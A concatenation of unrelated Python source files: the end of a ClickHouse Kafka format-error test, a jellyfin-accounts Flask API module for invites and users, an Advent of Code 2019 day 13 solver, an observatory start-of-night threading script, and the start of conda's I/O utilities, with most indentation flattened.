f\xe3\xe3\xdd\x8d\x0e\x5f\x4f\x27\x3e\xb7\x61\x97\xb2\x49\xb9\xaf\x90\x20\x92\x27\x32\x2a\x6b\xf4\xf3\x0d\x1e\x82\x20\xe8\x59\x28\x09\x4c\x46\x4c\x33\xcb\x7a\x76\x95\x41\x47\x9f\x14\x78\x03\xde\x62\x6c\x54\x30\xb1\x51\x0a\xdb\x8b\x89\x58\x11\xbb\x22\xac\x08\x9a\xe5\x6c\x71\xbf\x3d\xb8\x39\x92\xfa\x7f\x86\x1a\xd3\x54\x1e\xa7\xee\xcc\x7e\x08\x9e\x01\x10\x01\x18\x80\x80\x10\x22\x02\x00\x0c\x28\x57\x30\x06\x82\xf4\x03\x03\x4f\x52\x43\x18',
# broken message
b'\x4f\x52\x43\x0a\x0b\x0a\x03\x00\x00\x00\x12\x04\x08\x01\x50\x00\x0a\x15\x0a\x05\x00\x00\x00\x00\x00\x12\x0c\x08\x01\x12\x06\x08\x00\x10\x00\x18\x00\x50\x00\x0a\x12\x0a\x06\x00\x00\x00\x00\x00\x00\x12\x08\x08\x01\x42\x02\x08\x06\x50\x00\x0a\x12\x0a\x06\x00\x00\x00\x00\x00\x00\x12\x08\x08\x01\x42\x02\x08\x04\x50\x00\x0a\x29\x0a\x04\x00\x00\x00\x00\x12\x21\x08\x01\x1a\x1b\x09\x00\x00\x00\x00\x00\x00\xe0\x3f\x11\x00\x00\x00\x00\x00\x00\xe0\x3f\x19\x00\x00\x00\x00\x00\x00\xe0\x3f\x50\x00\x0a\x15\x0a\x05\x00\x00\x00\x00\x00\x12\x0c\x08\x01\x12\x06\x08\x02\x10\x02\x18\x02\x50\x00\xff\x80\xff\x80\xff\x00\xff\x80\xff\x03\x42\x41\x44\xff\x80\xff\x02\x41\x4d\xff\x80\x00\x00\x00\x3f\xff\x80\xff\x01\x0a\x06\x08\x06\x10\x00\x18\x0d\x0a\x06\x08\x06\x10\x01\x18\x17\x0a\x06\x08\x06\x10\x02\x18\x14\x0a\x06\x08\x06\x10\x03\x18\x14\x0a\x06\x08\x06\x10\x04\x18\x2b\x0a\x06\x08\x06\x10\x05\x18\x17\x0a\x06\x08\x00\x10\x00\x18\x02\x0a\x06\x08\x00\x10\x01\x18\x02\x0a\x06\x08\x01\x10\x01\x18\x02\x0a\x06\x08\x00\x10\x02\x18\x02\x0a\x06\x08\x02\x10\x02\x18\x02\x0a\x06\x08\x01\x10\x02\x18\x03\x0a\x06\x08\x00\x10\x03\x18\x02\x0a\x06\x08\x02\x10\x03\x18\x02\x0a\x06\x08\x01\x10\x03\x18\x02\x0a\x06\x08\x00\x10\x04\x18\x02\x0a\x06\x08\x01\x10\x04\x18\x04\x0a\x06\x08\x00\x10\x05\x18\x02\x0a\x06\x08\x01\x10\x05\x18\x02\x12\x04\x08\x00\x10\x00\x12\x04\x08\x00\x10\x00\x12\x04\x08\x00\x10\x00\x12\x04\x08\x00\x10\x00\x12\x04\x08\x00\x10\x00\x12\x04\x08\x00\x10\x00\x1a\x03\x47\x4d\x54\x0a\x59\x0a\x04\x08\x01\x50\x00\x0a\x0c\x08\x01\x12\x06\x08\x00\x10\x00\x18\x00\x50\x00\x0a\x08\x08\x01\x42\x02\x08\x06\x50\x00\x0a\x08\x08\x01\x42\x02\x08\x04\x50\x00\x0a\x21\x08\x01\x1a\x1b\x09\x00\x00\x00\x00\x00\x00\xe0\x3f\x11\x00\x00\x00\x00\x00\x00\xe0\x3f\x19\x00\x00\x00\x00\x00\x00\xe0\x3f\x50\x00\x0a\x0c\x08\x01\x12\x06\x08\x02\x10\x02\x18\x02\x50\x00\x08\x03\x10\xec\x02\x1a\x0c\x08\x03\x10\x8e\x01\x18\x1d\x20\xc1\x01\x28\x01\x22\x2e\x08\x0c\x12\x05\x01\x02\x03\x04\x05\x1a\x02\x69\x64\x1a\x07\x62\x6c\x6f\x63\x6b\x4e\x6f\x1a\x04\x76\x61\x6c\x31\x1a\x04\x76\x61\x6c\x32\x1a\x04\x76\x61\x6c\x33\x20\x00\x28\x00\x30\x00\x22\x08\x08\x04\x20\x00\x28\x00\x30\x00\x22\x08\x08\x08\x20\x00\x28\x00\x30\x00\x22\x08\x08\x08\x20\x00\x28\x00\x30\x00\x22\x08\x08\x05\x20\x00\x28\x00\x30\x00\x22\x08\x08\x01\x20\x00\x28\x00\x30\x00\x30\x01\x3a\x04\x08\x01\x50\x00\x3a\x0c\x08\x01\x12\x06\x08\x00\x10\x00\x18\x00\x50\x00\x3a\x08\x08\x01\x42\x02\x08\x06\x50\x00\x3a\x08\x08\x01\x42\x02\x08\x04\x50\x00\x3a\x21\x08\x01\x1a\x1b\x09\x00\x00\x00\x00\x00\x00\xe0\x3f\x11\x00\x00\x00\x00\x00\x00\xe0\x3f\x19\x00\x00\x00\x00\x00\x00\xe0\x3f\x50\x00\x3a\x0c\x08\x01\x12\x06\x08\x02\x10\x02\x18\x02\x50\x00\x40\x90\x4e\x48\x01\x08\xd5\x01\x10\x00\x18\x80\x80\x04\x22\x02\x00\x0b\x28\x5b\x30\x06\x82\xf4\x03\x03\x4f\x52\x43\x18',
],
'expected':r'''{"raw_message":"4F52430A0B0A030000001204080150000A150A050000000000120C0801120608001000180050000A120A06000000000000120808014202080650000A120A06000000000000120808014202080450000A290A0400000000122108011A1B09000000000000E03F11000000000000E03F19000000000000E03F50000A150A050000000000120C080112060802100218025000FF80FF80FF00FF80FF03424144FF80FF02414DFF800000003FFF80FF010A0608061000180D0A060806100118170A060806100218140A060806100318140A0608061004182B0A060806100518170A060800100018020A060800100118020A060801100118020A060800100218020A060802100218020A060801100218030A060800100318020A060802100318020A060801100318020A060800100418020A060801100418040A060800100518020A060801100518021204080010001204080010001204080010001204080010001204080010001204080010001A03474D540A590A04080150000A0C0801120608001000180050000A0808014202080650000A0808014202080450000A2108011A1B09000000000000E03F11000000000000E03F19000000000000E03F50000A0C080112060802100218025000080310EC021A0C0803108E01181D20C1012801222E080C120501020304051A0269641A07626C6F636B4E6F1A0476616C311A0476616C321A0476616C33200028003000220808042000280030002208080820002800300022080808200028003000220808052000280030002208080120002800300030013A04080150003A0C0801120608001000180050003A0808014202080650003A0808014202080450003A2108011A1B09000000000000E03F11000000000000E03F19000000000000E03F50003A0C08011206080210021802500040904E480108D5011000188080042202000B285B300682F403034F524318","error":"Cannot parse string 'BAD' as UInt16: syntax error at begin of string. Note: there are toUInt16OrZero and toUInt16OrNull functions, which returns zero\/NULL instead of throwing exception."}''',
'printable':False,
}
}
topic_name_prefix = 'format_tests_4_stream_'
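# Create one Kafka topic and table per format; kafka_handle_error_mode='stream' routes
# unparsable messages into the *_errors_* materialized view instead of failing the consumer.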
for format_name, format_opts in list(all_formats.items()):
print(('Set up {}'.format(format_name)))
topic_name = topic_name_prefix + '{}'.format(format_name)
data_sample = format_opts['data_sample']
data_prefix = []
raw_message = '_raw_message'
# prepend empty value when supported
if format_opts.get('supports_empty_value', False):
data_prefix = data_prefix + ['']
    if not format_opts.get('printable', False):
raw_message = 'hex(_raw_message)'
kafka_produce(kafka_cluster, topic_name, data_prefix + data_sample)
instance.query('''
DROP TABLE IF EXISTS test.kafka_{format_name};
CREATE TABLE test.kafka_{format_name} (
id Int64,
blockNo UInt16,
val1 String,
val2 Float32,
val3 UInt8
) ENGINE = Kafka()
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = '{topic_name}',
kafka_group_name = '{topic_name}',
kafka_format = '{format_name}',
kafka_handle_error_mode = 'stream',
kafka_flush_interval_ms = 1000 {extra_settings};
DROP TABLE IF EXISTS test.kafka_data_{format_name}_mv;
CREATE MATERIALIZED VIEW test.kafka_data_{format_name}_mv Engine=Log AS
SELECT *, _topic, _partition, _offset FROM test.kafka_{format_name}
WHERE length(_error) = 0;
DROP TABLE IF EXISTS test.kafka_errors_{format_name}_mv;
CREATE MATERIALIZED VIEW test.kafka_errors_{format_name}_mv Engine=Log AS
SELECT {raw_message} as raw_message, _error as error, _topic as topic, _partition as partition, _offset as offset FROM test.kafka_{format_name}
WHERE length(_error) > 0;
'''.format(topic_name=topic_name, format_name=format_name, raw_message=raw_message,
extra_settings=format_opts.get('extra_settings') or ''))
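# Consume each topic and verify that the well-formed messages land in the data view and that
# the deliberately broken message is captured, with its raw payload, in the errors view.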
for format_name, format_opts in list(all_formats.items()):
print(('Checking {}'.format(format_name)))
topic_name = topic_name_prefix + '{}'.format(format_name)
# shift offsets by 1 if format supports empty value
offsets = [1, 2, 3] if format_opts.get('supports_empty_value', False) else [0, 1, 2]
result = instance.query('SELECT * FROM test.kafka_data_{format_name}_mv;'.format(format_name=format_name))
expected = '''\
0 0 AM 0.5 1 {topic_name} 0 {offset_0}
1 0 AM 0.5 1 {topic_name} 0 {offset_1}
2 0 AM 0.5 1 {topic_name} 0 {offset_1}
3 0 AM 0.5 1 {topic_name} 0 {offset_1}
4 0 AM 0.5 1 {topic_name} 0 {offset_1}
5 0 AM 0.5 1 {topic_name} 0 {offset_1}
6 0 AM 0.5 1 {topic_name} 0 {offset_1}
7 0 AM 0.5 1 {topic_name} 0 {offset_1}
8 0 AM 0.5 1 {topic_name} 0 {offset_1}
9 0 AM 0.5 1 {topic_name} 0 {offset_1}
10 0 AM 0.5 1 {topic_name} 0 {offset_1}
11 0 AM 0.5 1 {topic_name} 0 {offset_1}
12 0 AM 0.5 1 {topic_name} 0 {offset_1}
13 0 AM 0.5 1 {topic_name} 0 {offset_1}
14 0 AM 0.5 1 {topic_name} 0 {offset_1}
15 0 AM 0.5 1 {topic_name} 0 {offset_1}
0 0 AM 0.5 1 {topic_name} 0 {offset_2}
'''.format(topic_name=topic_name, offset_0=offsets[0], offset_1=offsets[1], offset_2=offsets[2])
# print(('Checking result\n {result} \n expected \n {expected}\n'.format(result=str(result), expected=str(expected))))
assert TSV(result) == TSV(expected), 'Proper result for format: {}'.format(format_name)
errors_result = instance.query('SELECT raw_message, error FROM test.kafka_errors_{format_name}_mv format JSONEachRow'.format(format_name=format_name))
errors_expected = format_opts['expected']
# print(errors_result.strip())
# print(errors_expected.strip())
assert errors_result.strip() == errors_expected.strip(), 'Proper errors for format: {}'.format(format_name)
if __name__ == '__main__':
cluster.start()
input("Cluster created, press any key to destroy...")
cluster.shutdown()
|
web_api.py
|
# A bit of a mess, but mostly handles API endpoints and a couple of compatibility fixes
from flask import request, jsonify
from jellyfin_accounts.jf_api import Jellyfin
import json
import datetime
import secrets
import time
import threading
import os
import sys
import psutil
from jellyfin_accounts import (
config,
config_path,
app,
g,
data_store,
resp,
configparser,
config_base_path,
)
from jellyfin_accounts.email import Mailgun, Smtp
from jellyfin_accounts import web_log as log
from jellyfin_accounts.validate_password import PasswordValidator
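# Render a datetime using the configured date format, appending a 24h or 12h clock time.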
def format_datetime(dt):
result = dt.strftime(config["email"]["date_format"])
if config.getboolean("email", "use_24h"):
result += f' {dt.strftime("%H:%M")}'
else:
result += f' {dt.strftime("%I:%M %p")}'
return result
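# Check whether an invite code is valid. Expired or exhausted invites are deleted (sending
# expiry notifications where configured); when used=True the matching invite is consumed
# and the username is recorded against it.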
def checkInvite(code, used=False, username=None):
current_time = datetime.datetime.now()
invites = dict(data_store.invites)
match = False
for invite in invites:
if (
"remaining-uses" not in invites[invite]
and "no-limit" not in invites[invite]
):
invites[invite]["remaining-uses"] = 1
expiry = datetime.datetime.strptime(
invites[invite]["valid_till"], "%Y-%m-%dT%H:%M:%S.%f"
)
if current_time >= expiry or (
"no-limit" not in invites[invite] and invites[invite]["remaining-uses"] < 1
):
log.debug(f"Housekeeping: Deleting expired invite {invite}")
if (
config.getboolean("notifications", "enabled")
and "notify" in invites[invite]
):
for address in invites[invite]["notify"]:
if "notify-expiry" in invites[invite]["notify"][address]:
if invites[invite]["notify"][address]["notify-expiry"]:
method = config["email"]["method"]
if method == "mailgun":
email = Mailgun(address)
elif method == "smtp":
email = Smtp(address)
if email.construct_expiry(
{"code": invite, "expiry": expiry}
):
threading.Thread(target=email.send).start()
del data_store.invites[invite]
elif invite == code:
match = True
if used:
delete = False
inv = dict(data_store.invites[code])
if "used-by" not in inv:
inv["used-by"] = []
if "remaining-uses" in inv:
if inv["remaining-uses"] == 1:
delete = True
del data_store.invites[code]
elif "no-limit" not in invites[invite]:
inv["remaining-uses"] -= 1
inv["used-by"].append([username, format_datetime(current_time)])
if not delete:
data_store.invites[code] = inv
return match
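# Connect and authenticate with the Jellyfin server, retrying a few times before giving up.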
jf = Jellyfin(
config["jellyfin"]["server"],
config["jellyfin"]["client"],
config["jellyfin"]["version"],
config["jellyfin"]["device"],
config["jellyfin"]["device_id"],
)
from jellyfin_accounts.login import auth
jf_address = config["jellyfin"]["server"]
success = False
for i in range(3):
try:
jf.authenticate(config["jellyfin"]["username"], config["jellyfin"]["password"])
success = True
log.info(f"Successfully authenticated with {jf_address}")
break
except Jellyfin.AuthenticationError:
log.error(f"Failed to authenticate with {jf_address}, Retrying...")
time.sleep(5)
if not success:
log.error("Could not authenticate after 3 tries.")
exit()
# Temporary fixes below.
def switchToIds():
try:
with open(config["files"]["emails"], "r") as f:
emails = json.load(f)
except (FileNotFoundError, json.decoder.JSONDecodeError):
emails = {}
users = jf.getUsers(public=False)
new_emails = {}
match = False
for key in emails:
for user in users:
if user["Name"] == key:
match = True
new_emails[user["Id"]] = emails[key]
elif user["Id"] == key:
new_emails[user["Id"]] = emails[key]
if match:
from pathlib import Path
email_file = Path(config["files"]["emails"]).name
log.info(
(
f"{email_file} modified to use userID instead of "
+ "usernames. These will be used in future."
)
)
emails = new_emails
with open(config["files"]["emails"], "w") as f:
f.write(json.dumps(emails, indent=4))
# Temporary, switches emails.json over from using Usernames to User IDs.
switchToIds()
from packaging import version
if (
version.parse(jf.info["Version"]) >= version.parse("10.6.0")
and bool(data_store.user_template) is not False
):
if (
data_store.user_template["AuthenticationProviderId"]
== "Emby.Server.Implementations.Library.DefaultAuthenticationProvider"
):
log.info("Updating user_template for Jellyfin >= 10.6.0")
data_store.user_template[
"AuthenticationProviderId"
] = "Jellyfin.Server.Implementations.Users.DefaultAuthenticationProvider"
if (
data_store.user_template["PasswordResetProviderId"]
== "Emby.Server.Implementations.Library.DefaultPasswordResetProvider"
):
data_store.user_template[
"PasswordResetProviderId"
] = "Jellyfin.Server.Implementations.Users.DefaultPasswordResetProvider"
def validator():
if config.getboolean("password_validation", "enabled"):
return PasswordValidator(
config["password_validation"]["min_length"],
config["password_validation"]["upper"],
config["password_validation"]["lower"],
config["password_validation"]["number"],
config["password_validation"]["special"],
)
return PasswordValidator(0, 0, 0, 0, 0)
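# Create a Jellyfin account from an invite: validate the password, create the user, consume
# the invite, then apply the stored policy/homescreen defaults and record the email address.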
@app.route("/newUser", methods=["POST"])
def newUser():
data = request.get_json()
log.debug("Attempted newUser")
if checkInvite(data["code"]):
validation = validator().validate(data["password"])
valid = True
for criterion in validation:
if validation[criterion] is False:
valid = False
if valid:
log.debug("User password valid")
try:
user = jf.newUser(data["username"], data["password"])
except Jellyfin.UserExistsError:
error = f'User already exists named {data["username"]}'
log.debug(error)
return jsonify({"error": error})
except:
return jsonify({"error": "Unknown error"})
invites = dict(data_store.invites)
checkInvite(data["code"], used=True, username=data["username"])
if (
config.getboolean("notifications", "enabled")
and "notify" in invites[data["code"]]
):
for address in invites[data["code"]]["notify"]:
if "notify-creation" in invites[data["code"]]["notify"][address]:
if invites[data["code"]]["notify"][address]["notify-creation"]:
method = config["email"]["method"]
if method == "mailgun":
email = Mailgun(address)
elif method == "smtp":
email = Smtp(address)
if email.construct_created(
{
"code": data["code"],
"username": data["username"],
"created": datetime.datetime.now(),
}
):
threading.Thread(target=email.send).start()
if user.status_code == 200:
try:
policy = data_store.user_template
if policy != {}:
jf.setPolicy(user.json()["Id"], policy)
else:
log.debug("user policy was blank")
except:
log.error("Failed to set new user policy")
try:
configuration = data_store.user_configuration
displayprefs = data_store.user_displayprefs
if configuration != {} and displayprefs != {}:
if jf.setConfiguration(user.json()["Id"], configuration):
jf.setDisplayPreferences(user.json()["Id"], displayprefs)
log.debug("Set homescreen layout.")
else:
log.debug("user configuration and/or displayprefs were blank")
except:
log.error("Failed to set new user homescreen layout")
if config.getboolean("password_resets", "enabled"):
data_store.emails[user.json()["Id"]] = data["email"]
log.debug("Email address stored")
log.info("New user created")
else:
log.error(f"New user creation failed: {user.status_code}")
return resp(False)
else:
log.debug("User password invalid")
return jsonify(validation)
else:
log.debug("Attempted newUser unauthorized")
return resp(False, code=401)
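# Create a new invite with an expiry, an optional use limit, and optional email delivery.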
@app.route("/generateInvite", methods=["POST"])
@auth.login_required
def generateInvite():
current_time = datetime.datetime.now()
data = request.get_json()
delta = datetime.timedelta(
days=int(data["days"]), hours=int(data["hours"]), minutes=int(data["minutes"])
)
invite_code = secrets.token_urlsafe(16)
invite = {}
invite["created"] = format_datetime(current_time)
if data["multiple-uses"]:
if data["no-limit"]:
invite["no-limit"] = True
else:
invite["remaining-uses"] = int(data["remaining-uses"])
else:
invite["remaining-uses"] = 1
log.debug(f"Creating new invite: {invite_code}")
valid_till = current_time + delta
invite["valid_till"] = valid_till.strftime("%Y-%m-%dT%H:%M:%S.%f")
if "email" in data and config.getboolean("invite_emails", "enabled"):
address = data["email"]
invite["email"] = address
log.info(f"Sending invite to {address}")
method = config["email"]["method"]
if method == "mailgun":
from jellyfin_accounts.email import Mailgun
email = Mailgun(address)
elif method == "smtp":
from jellyfin_accounts.email import Smtp
email = Smtp(address)
email.construct_invite({"expiry": valid_till, "code": invite_code})
response = email.send()
if response is False or type(response) != bool:
invite["email"] = f"Failed to send to {address}"
if config.getboolean("notifications", "enabled"):
if "notify-creation" in data:
invite["notify-creation"] = data["notify-creation"]
if "notify-expiry" in data:
invite["notify-expiry"] = data["notify-expiry"]
data_store.invites[invite_code] = invite
log.info(f"New invite created: {invite_code}")
return resp()
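# Return all current invites along with their remaining validity and notification settings.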
@app.route("/getInvites", methods=["GET"])
@auth.login_required
def getInvites():
log.debug("Invites requested")
current_time = datetime.datetime.now()
invites = dict(data_store.invites)
for code in invites:
checkInvite(code)
invites = dict(data_store.invites)
response = {"invites": []}
for code in invites:
expiry = datetime.datetime.strptime(
invites[code]["valid_till"], "%Y-%m-%dT%H:%M:%S.%f"
)
valid_for = expiry - current_time
invite = {
"code": code,
"days": valid_for.days,
"hours": valid_for.seconds // 3600,
"minutes": (valid_for.seconds // 60) % 60,
}
if "created" in invites[code]:
invite["created"] = invites[code]["created"]
if "used-by" in invites[code]:
invite["used-by"] = invites[code]["used-by"]
if "no-limit" in invites[code]:
invite["no-limit"] = invites[code]["no-limit"]
if "remaining-uses" in invites[code]:
invite["remaining-uses"] = invites[code]["remaining-uses"]
else:
invite["remaining-uses"] = 1
if "email" in invites[code]:
invite["email"] = invites[code]["email"]
if "notify" in invites[code]:
if config.getboolean("ui", "jellyfin_login"):
address = data_store.emails[g.user.id]
else:
address = config["ui"]["email"]
if address in invites[code]["notify"]:
if "notify-expiry" in invites[code]["notify"][address]:
invite["notify-expiry"] = invites[code]["notify"][address][
"notify-expiry"
]
if "notify-creation" in invites[code]["notify"][address]:
invite["notify-creation"] = invites[code]["notify"][address][
"notify-creation"
]
response["invites"].append(invite)
return jsonify(response)
@app.route("/deleteInvite", methods=["POST"])
@auth.login_required
def deleteInvite():
code = request.get_json()["code"]
invites = dict(data_store.invites)
if code in invites:
del data_store.invites[code]
log.info(f"Invite deleted: {code}")
return resp()
@app.route("/getToken")
@auth.login_required
def get_token():
token = g.user.generate_token()
return jsonify({"token": token.decode("ascii")})
@app.route("/getUsers", methods=["GET"])
@auth.login_required
def getUsers():
log.debug("User and email list requested")
response = {"users": []}
users = jf.getUsers(public=False)
emails = data_store.emails
for user in users:
entry = {"name": user["Name"]}
if user["Id"] in emails:
entry["email"] = emails[user["Id"]]
response["users"].append(entry)
return jsonify(response)
@app.route("/modifyUsers", methods=["POST"])
@auth.login_required
def modifyUsers():
data = request.get_json()
log.debug("Email list modification requested")
for key in data:
uid = jf.getUsers(key, public=False)["Id"]
data_store.emails[uid] = data[key]
log.debug(f'Email for user "{key}" modified')
return resp()
@app.route("/setDefaults", methods=["POST"])
@auth.login_required
def setDefaults():
data = request.get_json()
username = data["username"]
log.debug(f"Storing default settings from user {username}")
try:
user = jf.getUsers(username=username, public=False)
except Jellyfin.UserNotFoundError:
log.error(f"Storing defaults failed: Couldn't find user {username}")
return resp(False)
uid = user["Id"]
policy = user["Policy"]
data_store.user_template = policy
if data["homescreen"]:
configuration = user["Configuration"]
try:
displayprefs = jf.getDisplayPreferences(uid)
data_store.user_configuration = configuration
data_store.user_displayprefs = displayprefs
except:
log.error("Storing defaults failed: " + "couldn't store homescreen layout")
return resp(False)
return resp()
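# Apply config changes submitted from the UI, write them back to the config file,
# and optionally restart the process.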
@app.route("/modifyConfig", methods=["POST"])
@auth.login_required
def modifyConfig():
global config
log.info("Config modification requested")
data = request.get_json()
temp_config = configparser.RawConfigParser(
comment_prefixes="/", allow_no_value=True
)
temp_config.read(str(config_path.resolve()))
for section in data:
if section in temp_config and 'restart-program' not in section:
for item in data[section]:
temp_config[section][item] = data[section][item]
data[section][item] = True
log.debug(f"{section}/{item} modified")
with open(config_path, "w") as config_file:
temp_config.write(config_file)
config.trigger_reload()
log.info("Config written.")
if 'restart-program' in data:
if data['restart-program']:
log.info('Restarting...')
try:
proc = psutil.Process(os.getpid())
for handler in proc.open_files() + proc.connections():
os.close(handler.fd)
except Exception as e:
log.error(f'Failed restart: {type(e).__name__}')
python = sys.executable
os.execl(python, python, *sys.argv)
return resp()
@app.route("/getConfig", methods=["GET"])
@auth.login_required
def getConfig():
log.debug("Config requested")
with open(config_base_path, "r") as f:
config_base = json.load(f)
# config.read(config_path)
response_config = config_base
for section in config_base:
for entry in config_base[section]:
if entry in config[section]:
response_config[section][entry]["value"] = config[section][entry]
return jsonify(response_config), 200
@app.route("/setNotify", methods=["POST"])
@auth.login_required
def setNotify():
data = request.get_json()
change = False
for code in data:
for key in data[code]:
if key in ["notify-expiry", "notify-creation"]:
inv = data_store.invites[code]
if config.getboolean("ui", "jellyfin_login"):
address = data_store.emails[g.user.id]
else:
address = config["ui"]["email"]
if "notify" not in inv:
inv["notify"] = {}
if address not in inv["notify"]:
inv["notify"][address] = {}
inv["notify"][address][key] = data[code][key]
log.debug(f"{code}: Notification settings changed")
change = True
if change:
data_store.invites[code] = inv
return resp()
return resp(success=False)
|
solve.py
|
from time import sleep
from event2019.day13.computer_v4 import Computer_v4
from queue import Queue
from threading import Thread
########
# PART 1
computer = Computer_v4()
computer.load_code("event2019/day13/input.txt")
computer.run()
output = computer.get_output()
screen = {(x, y): t for x, y, t in (zip(*(iter(output),) * 3))}
answer = len({p: t for p, t in screen.items() if t == 2}.keys())
print("Part 1 =", answer)
assert answer == 335 # check with accepted answer
########
# PART 2
def print_screen(screen):
w, h = 0, 0
for x, y in screen.keys():
w = max(w, x)
h = max(h, y)
for y in range(h + 1):
for x in range(w + 1):
c = screen.get((x, y), 0)
if (c == 1):
print(end="█")
elif (c == 2):
print(end="░")
elif (c == 3):
print(end="_")
elif (c == 4):
print(end="∙")
else:
print(end=" ")
print()
print("Score = ", screen.get((-1, 0), 0))
#print_screen(screen)
screen = {}
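# Joystick input for the Intcode computer: move the paddle toward the ball's x position.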
def get_player_processor():
def input_player(input_func):
ball_x = [x for (x, _), t in screen.items() if t == 4][0]
paddle_x = [x for (x, _), t in screen.items() if t == 3][0]
if paddle_x < ball_x:
return 1
elif paddle_x > ball_x:
return -1
else:
return 0
return input_player
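# Output handler: buffer values into (x, y, tile) triplets and draw them onto the screen dict.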
def get_update_screen_processor():
current_command = []
def update_screen(val):
current_command.append(val)
if (len(current_command) == 3):
screen[(current_command[0], current_command[1])] = current_command[2]
current_command.clear()
return update_screen
# setup the brain on a different thread
computer = Computer_v4()
computer.load_code("event2019/day13/input.txt")
computer.set_memory_value(0, 2)
computer_in = Queue()
computer_out = Queue()
computer.set_input_processor(get_player_processor())
computer.set_output_processor(get_update_screen_processor())
t = Thread(target=computer.run, daemon=True, args=(computer_in, computer_out))
t.start()
print("Running")
# wait to complete
t.join()
# get the score
answer = screen[(-1, 0)]
print("Part 2 =", answer)
assert answer == 15706 # check with accepted answer
#print_screen(screen)
|
ocs_start_of_night_thread.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# +
# import(s)
# -
from OcsCameraEntity import *
from OcsSequencerEntity import *
import threading
import os
# +
# function: worker_code()
# -
def worker_code(entity='', entobj=None):
# debug output
print('name: {0:s}'.format(threading.currentThread().getName()))
print('entity: {0:s}'.format(entity))
if hasattr(os, 'getppid'):
print('parent process id: {0:s}'.format(str(os.getppid())))
if hasattr(os, 'getpid'):
print('process id: {0:s}'.format(str(os.getpid())))
# do start_of_night stuff
if entobj:
# enter control
entobj.logger.info('{0:s}.entercontrol()'.format(entity))
entobj.entercontrol()
# start
entobj.logger.info("{0:s}.start('Normal')".format(entity))
entobj.start('Normal')
# enable
entobj.logger.info('{0:s}.enable()'.format(entity))
entobj.enable()
# return
return
# +
# main()
# -
if __name__ == "__main__":
    # create shared entities
camera = OcsCameraEntity('CCS', 'Camera', False)
sequencer = OcsSequencerEntity('OCS', 'ocs', False)
# create jobs for each entity:
jobs = []
for E in ( camera, sequencer ):
j = threading.Thread(target=worker_code, args=(E._entity, E))
jobs.append(j)
j.start()
for j in jobs:
j.join()
print('{0:s} exited'.format(j.name))
|
io.py
|
# -*- coding: utf-8 -*-
# Copyright (C) 2012 Anaconda, Inc
# SPDX-License-Identifier: BSD-3-Clause
from __future__ import absolute_import, division, print_function, unicode_literals
from collections import defaultdict
from concurrent.futures import ProcessPoolExecutor, ThreadPoolExecutor, Executor, Future, _base, as_completed # NOQA
from concurrent.futures.thread import _WorkItem
from contextlib import contextmanager
from enum import Enum
from errno import EPIPE, ESHUTDOWN
from functools import partial, wraps
import sys
if sys.version_info[0] > 2:
    # Used below in captured() to detect BytesIO capture targets.
from io import BytesIO
from itertools import cycle
import json
import logging # lgtm [py/import-and-import-from]
from logging import CRITICAL, Formatter, NOTSET, StreamHandler, WARN, getLogger
import os
from os.path import dirname, isdir, isfile, join
import signal
from threading import Event, Thread, Lock
from time import sleep, time
from .compat import StringIO, iteritems, on_win, encode_environment
from .constants import NULL
from .path import expand
from .._vendor.auxlib.decorators import memoizemethod
from .._vendor.auxlib.logz import NullHandler
from .._vendor.auxlib.type_coercion import boolify
from .._vendor.tqdm import tqdm
log = getLogger(__name__)
class DeltaSecondsFormatter(Formatter):
"""
Logging formatter with additional attributes for run time logging.
Attributes:
`delta_secs`:
Elapsed seconds since last log/format call (or creation of logger).
`relative_created_secs`:
Like `relativeCreated`, time relative to the initialization of the
`logging` module but conveniently scaled to seconds as a `float` value.
"""
def __init__(self, fmt=None, datefmt=None):
self.prev_time = time()
super(DeltaSecondsFormatter, self).__init__(fmt=fmt, datefmt=datefmt)
def format(self, record):
now = time()
prev_time = self.prev_time
self.prev_time = max(self.prev_time, now)
record.delta_secs = now - prev_time
record.relative_created_secs = record.relativeCreated / 1000
return super(DeltaSecondsFormatter, self).format(record)
if boolify(os.environ.get('CONDA_TIMED_LOGGING')):
_FORMATTER = DeltaSecondsFormatter(
"%(relative_created_secs) 7.2f %(delta_secs) 7.2f "
"%(levelname)s %(name)s:%(funcName)s(%(lineno)d): %(message)s"
)
else:
_FORMATTER = Formatter(
"%(levelname)s %(name)s:%(funcName)s(%(lineno)d): %(message)s"
)
def dashlist(iterable, indent=2):
return ''.join('\n' + ' ' * indent + '- ' + str(x) for x in iterable)
class ContextDecorator(object):
"""Base class for a context manager class (implementing __enter__() and __exit__()) that also
makes it a decorator.
"""
# TODO: figure out how to improve this pattern so e.g. swallow_broken_pipe doesn't have to be instantiated # NOQA
def __call__(self, f):
@wraps(f)
def decorated(*args, **kwds):
with self:
return f(*args, **kwds)
return decorated
class SwallowBrokenPipe(ContextDecorator):
# Ignore BrokenPipeError and errors related to stdout or stderr being
# closed by a downstream program.
def __enter__(self):
pass
def __exit__(self, exc_type, exc_val, exc_tb):
if (exc_val
and isinstance(exc_val, EnvironmentError)
and getattr(exc_val, 'errno', None)
and exc_val.errno in (EPIPE, ESHUTDOWN)):
return True
swallow_broken_pipe = SwallowBrokenPipe()
class CaptureTarget(Enum):
"""Constants used for contextmanager captured.
    Used similarly to the constants PIPE and STDOUT for stdlib's subprocess.Popen.
"""
STRING = -1
STDOUT = -2
@contextmanager
def env_vars(var_map=None, callback=None, stack_callback=None):
if var_map is None:
var_map = {}
new_var_map = encode_environment(var_map)
saved_vars = {}
for name, value in iteritems(new_var_map):
saved_vars[name] = os.environ.get(name, NULL)
os.environ[name] = value
try:
if callback:
callback()
if stack_callback:
stack_callback(True)
yield
finally:
for name, value in iteritems(saved_vars):
if value is NULL:
del os.environ[name]
else:
os.environ[name] = value
if callback:
callback()
if stack_callback:
stack_callback(False)
@contextmanager
def env_var(name, value, callback=None, stack_callback=None):
# Maybe, but in env_vars, not here:
# from conda.compat import ensure_fs_path_encoding
# d = dict({name: ensure_fs_path_encoding(value)})
d = {name: value}
with env_vars(d, callback=callback, stack_callback=stack_callback) as es:
yield es
@contextmanager
def env_unmodified(callback=None):
with env_vars(callback=callback) as es:
yield es
@contextmanager
def captured(stdout=CaptureTarget.STRING, stderr=CaptureTarget.STRING):
"""Capture outputs of sys.stdout and sys.stderr.
If stdout is STRING, capture sys.stdout as a string,
if stdout is None, do not capture sys.stdout, leaving it untouched,
otherwise redirect sys.stdout to the file-like object given by stdout.
Behave correspondingly for stderr with the exception that if stderr is STDOUT,
redirect sys.stderr to stdout target and set stderr attribute of yielded object to None.
Args:
stdout: capture target for sys.stdout, one of STRING, None, or file-like object
